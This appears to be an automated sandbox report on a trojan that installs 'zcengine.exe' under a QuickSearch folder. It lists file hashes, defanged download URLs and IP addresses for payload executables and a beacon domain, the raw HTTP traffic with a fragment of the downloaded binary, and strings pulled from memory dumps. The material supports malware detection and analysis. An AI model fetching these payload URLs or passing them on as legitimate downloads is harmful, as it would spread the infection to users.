7eda2ff995cacf43200cddb1acfe27b1
29bd205e8d1f66443cdc79b4c7bdc699
3fff1791278f0c7414a725119560a20a
a0616f00cb5758884772c13ed254b2ed
cc4df2465ca491bd3210e36a2f5beb2d
5e9153abe724a97e7f0cb29e4789037a
9d1fca8d24f89f05d6fde1e6eafc809b
b0176387691021265d1b0db042e3dd0d
59204a1103f2da8ba1d139e96c843855
1b73c20c425f423292a3d268ca2f4edb
ba3b71aa8286f21167a18939ee1a8fc3
56a312073eb7514321a08371447bcb61
8f5db7331d5524c9356cde639daca71b
9734aef2aded89bb408f17d66cb94570
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.flowsurf.net/setupfs_1123.exe | 82.165.149.116 |
hxxp://www.flowsurf.net/setupfs_4435.exe | 82.165.149.116 |
hxxp://www.kljlkjasdasdlmkmmk23443.com/s.php?i=a344e2cc15dfd82af6579b66c543039d&a=1 | 46.101.48.130 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /setupfs_1123.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.flowsurf.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 24 Dec 2015 06:44:30 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: hXXp://VVV.flowsurf.net/setupfs_4435.exe
<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>......
GET /setupfs_4435.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.flowsurf.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 24 Dec 2015 06:44:30 GMT
Content-Type: application/octet-stream
Content-Length: 5355188
Last-Modified: Mon, 07 Dec 2015 20:54:29 GMT
Connection: keep-alive
ETag: "5665f205-51b6b4"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`...............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc........`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
zcengine.exe_1208:
.text
`.rdata
@.data
.idata
.rsrc
@.reloc
l.dlf
xSSSh
FTPjKS
FtPj;S
C.PjRV
03319CCE-99CA-442D-B70F-1BB522848CE0
B74DEAEF-B834-486D-86EE-BB151FC7A989
F4C04932-3E63-4f27-BDDD-BB22870A181A
GetProcessWindowStation
operator
portuguese-brazilian
c:\dev\OutSourcing\KinnerLake\Spoofer\PCProxyWin\Release\PCProxyWin.pdb
%Program Files%\QuickSearch\zcengine.exe
KERNEL32.dll
GetProcessHeap
GetCPInfo
!4.42474
= =
mscoree.dll
KERNEL32.DLL
ADVAPI32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
zcengine.exe
3.0.0.0